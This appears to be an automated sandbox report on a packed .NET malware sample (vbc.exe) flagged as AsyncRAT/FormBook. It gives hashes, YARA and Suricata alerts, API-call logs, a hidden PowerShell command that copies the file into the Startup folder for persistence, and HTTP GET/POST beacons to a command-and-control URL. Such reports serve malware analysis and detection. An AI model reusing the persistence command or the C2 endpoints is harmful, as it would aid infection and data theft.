Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Aug. 19, 2021, 7:04 p.m.	Aug. 19, 2021, 7:15 p.m.

Size	302.5KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`2698e6b35f99ca40641a595ae9ffe1d0`
SHA256	`8bc80b212b0e625722edb58fa22d6a8e56ad344ecddc9e8ba18e740af7f20db9`
CRC32	`8ADBAC3C`
ssdeep	`6144:9bTezfNz42nbUFJcpCS6UqS4xE9CVdKrL:JezVz4J2pgjxQCi/`
PDB Path	C:\Users\Administrator\Desktop\Wghfhsgdgagdghs\Wghfhsgdgagdghs\obj\Debug\Wghfhsgdgagdghs.pdb
Yara	PE_Header_Zero - PE File Signature Admin_Tool_IN_Zero - Admin Tool Sysinternals Generic_Malware_Zero - Generic Malware Is_DotNET_EXE - (no description) IsPE32 - (no description) Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT

vbc.exe "C:\Users\test22\AppData\Local\Temp\vbc.exe"
2388
- PowerShell.exe "PowerShell" copy-item 'C:\Users\test22\AppData\Local\Temp\vbc.exe' 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NewTemp.exe'
  1048
- vbc.exe "C:\Users\test22\AppData\Local\Temp\vbc.exe"
  2552

Name	Response	Post-Analysis Lookup
www.phk0.com	A 52.203.81.245 CNAME expired.namebright.com A 3.232.205.82 CNAME cdl-lb-1356093980.us-east-1.elb.amazonaws.com	3.232.205.82
www.visionchief.com
www.kenobi.tech
www.bifboawdq.icu	A 47.91.170.222	47.91.170.222

IP Address	Status	Action
164.124.101.2	Active	Moloch
3.232.205.82	Active	Moloch
47.91.170.222	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49210 -> 3.232.205.82:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49210 -> 3.232.205.82:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49210 -> 3.232.205.82:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
UDP 192.168.56.101:61479 -> 164.124.101.2:53	2026888	ET INFO DNS Query for Suspicious .icu Domain	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 19, 2021, 7:13 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 19, 2021, 7:13 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 19, 2021, 7:13 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 19, 2021, 7:13 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 19, 2021, 7:13 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 19, 2021, 7:13 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 19, 2021, 7:04 p.m.			0	0
IsDebuggerPresent Aug. 19, 2021, 7:04 p.m.			0	0
IsDebuggerPresent Aug. 19, 2021, 7:13 p.m.			0	0

Uses Windows APIs to generate a cryptographic key (45 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 19, 2021, 7:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00604cc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00604e00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00604e00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00605b80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606280 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606280 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606280 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606280 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606280 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606280 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606140 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606140 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606140 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606180 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606300 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606300 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606300 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606300 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606300 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606300 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606300 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606300 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606300 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606300 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606300 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606300 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606300 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00606300 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006063c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006063c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006063c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 19, 2021, 7:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006063c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

This executable has a PDB path (1 event)

pdb_path

C:\Users\Administrator\Desktop\Wghfhsgdgagdghs\Wghfhsgdgagdghs\obj\Debug\Wghfhsgdgagdghs.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 19, 2021, 7:04 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header

suspicious_request

GET http://www.phk0.com/att3/?7nwlq86p=s6xHIXHwkbkuLkMEuQxW4dJ5qgMEdMcFcUb9+bif01noR916v29hb9QaAtQ7NLpH63SSbDD7&Ppd=Hb08qfEHozY8xx

Performs some HTTP requests (2 events)

request	POST http://www.phk0.com/att3/
request	GET http://www.phk0.com/att3/?7nwlq86p=s6xHIXHwkbkuLkMEuQxW4dJ5qgMEdMcFcUb9+bif01noR916v29hb9QaAtQ7NLpH63SSbDD7&Ppd=Hb08qfEHozY8xx

Sends data using the HTTP POST Method (1 event)

request

POST http://www.phk0.com/att3/

Allocates read-write-execute memory (usually to unpack itself) (50 out of 158 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 19, 2021, 7:04 p.m.	process_identifier: 2388 region_size: 1703936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:04 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00930000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 19, 2021, 7:04 p.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72741000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 19, 2021, 7:04 p.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72742000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:04 p.m.	process_identifier: 2388 region_size: 720896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:04 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00730000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:04 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:04 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00415000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:04 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0041b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:04 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00417000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:04 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003fc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:04 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:04 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:04 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00406000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:04 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0040a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:04 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00407000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:04 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:04 p.m.	process_identifier: 2388 region_size: 49152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005a1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:04 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005ad000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:04 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005ae000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:04 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:04 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 19, 2021, 7:04 p.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72644000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:04 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005af000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:04 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:04 p.m.	process_identifier: 2388 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a51000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:04 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a56000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:04 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a57000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:04 p.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a58000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:13 p.m.	process_identifier: 1048 region_size: 2228224 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:13 p.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02bd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 19, 2021, 7:13 p.m.	process_identifier: 1048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6d8d1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:13 p.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ffa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 19, 2021, 7:13 p.m.	process_identifier: 1048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6d8d2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:13 p.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ff2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:13 p.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02042000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:13 p.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02bd1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:13 p.m.	process_identifier: 1048 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02bd2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:13 p.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0206a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:13 p.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02043000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:13 p.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02044000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:13 p.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0207b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:13 p.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02077000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:13 p.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ffb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:13 p.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02062000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:13 p.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02075000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:13 p.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02045000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:13 p.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0206c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:13 p.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 7:13 p.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02046000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (1 event)

cmdline

"PowerShell" copy-item 'C:\Users\test22\AppData\Local\Temp\vbc.exe' 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NewTemp.exe'

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Aug. 19, 2021, 7:04 p.m.	thread_identifier: 2112 thread_handle: 0x00000174 process_identifier: 1048 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "PowerShell" copy-item 'C:\Users\test22\AppData\Local\Temp\vbc.exe' 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NewTemp.exe' filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000022c	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00048600', u'virtual_address': u'0x00002000', u'entropy': 7.853491917480554, u'name': u'.text', u'virtual_size': u'0x0004857c'}

entropy

7.85349191748

description

A section with a high entropy has been found

entropy

